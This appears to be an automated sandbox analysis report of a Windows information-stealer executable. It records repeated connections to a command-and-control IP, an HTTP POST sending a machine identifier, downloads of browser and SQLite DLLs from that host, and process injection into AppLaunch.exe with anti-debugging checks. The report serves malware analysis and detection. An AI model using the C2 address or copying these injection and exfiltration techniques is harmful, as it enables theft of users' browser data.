00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://ocsp.digicert.com0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe String found in binary or memory: http://www.opera.com0
Source: sqlite3.dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://mozilla.org0
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 89.208.103.4Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 63 37 38 33 64 31 36 36 64 37 30 66 33 33 32 62 37 32 38 30 33 30 65 38 36 32 62 38 32 39 65 38 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=c783d166d70f332b728030e862b829e8
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: qwrqrwrqwrqwrHost: 89.208.103.4Connection: Keep-AliveCache-Control: no-cache
Uses 32bit PE files
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Detected potential crypto function
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013C15B2 0_2_013C15B2
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BFDCC 0_2_013BFDCC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BCC58 0_2_013BCC58
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BFCAC 0_2_013BFCAC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B4364 0_2_013B4364
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BC7C0 0_2_013BC7C0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: String function: 013B24E0 appears 31 times
PE / OLE file has an invalid certificate
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Virustotal: Detection: 22%
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe "C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe"
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/12@0/1
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.1.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.1.dr
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
PE file contains sections with non-standard names
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /31
Source: sqlite3.dll.1.dr Static PE information: section name: /45
Source: sqlite3.dll.1.dr Static PE information: section name: /57
Source: sqlite3.dll.1.dr Static PE information: section name: /70
Source: sqlite3.dll.1.dr Static PE information: section name: /81
Source: sqlite3.dll.1.dr Static PE information: section name: /92
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B11B0 LoadLibraryA,GetProcAddress, 0_2_013B11B0
PE file contains an invalid checksum
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: real checksum: 0x489ec should be: 0x3e27a
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B8E50 FindFirstFileExW, 0_2_013B8E50
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B4DC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013B4DC9
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B11B0 LoadLibraryA,GetProcAddress, 0_2_013B11B0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BAD73 GetProcessHeap, 0_2_013BAD73
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B599A mov eax, dword ptr fs:[00000030h] 0_2_013B599A
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013BA2CC mov eax, dword ptr fs:[00000030h] 0_2_013BA2CC
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013D8C0C mov eax, dword ptr fs:[00000030h] 0_2_013D8C0C
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B2412 SetUnhandledExceptionFilter, 0_2_013B2412
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B2525 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_013B2525
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B4DC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013B4DC9
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B22B0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013B22B0

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 83C008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
DLL side loading technique detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
